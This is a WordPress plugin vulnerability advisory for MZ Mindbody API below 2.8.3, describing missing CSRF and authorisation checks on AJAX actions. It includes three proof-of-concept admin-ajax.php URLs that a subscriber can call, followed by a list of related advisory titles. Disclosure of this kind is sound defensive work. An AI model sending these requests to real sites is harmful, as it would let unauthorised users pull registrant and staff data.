MZ Mindbody API < 2.8.3 – Unauthorised AJAX Calls | Plugin Vulnerabilities

Description

The plugin did not properly check for CSRF and authorisation in various AJAX actions, allowing attacker to make users call them and perform unwanted actions, as well as allow low privilege users to call them

Proof of Concept

As a low privilege user (such as subscriber)

https://example.com/wp-admin/admin-ajax.php?action=mz_deduce_class_owners
https://example.com/wp-admin/admin-ajax.php?action=mz_mbo_get_registrants&classID=1
https://example.com/wp-admin/admin-ajax.php?action=mz_mbo_get_staff&staffID=1

Affects Plugins

mz-mindbody-api

Fixed in 2.8.3

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

db735773-03a8-47e0-837a-e1cae4d31007

Timeline

Publicly Published

2021-06-30 (about 4 years ago)

Added

2021-06-30 (about 4 years ago)

Last Updated

2021-06-30 (about 4 years ago)

Other

Published

Title

Published

2023-12-07

Title

Caddy < 1.9.8 - Cross-Site Request Forgery

Published

2024-11-18

Title

Jobify - Job Board WordPress Theme <= 4.2.3 - Cross-Site Request Forgery

Published

2025-04-09

Title

Ultra Demo Importer <= 1.0.5 - Cross-Site Request Forgery to Remote Code Execution

Published

2026-02-10

Title

Quiz Maker < 6.7.1.3 - Cross-Site Request Forgery

Published

2025-01-24

Title

ReviewsTap < 1.1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting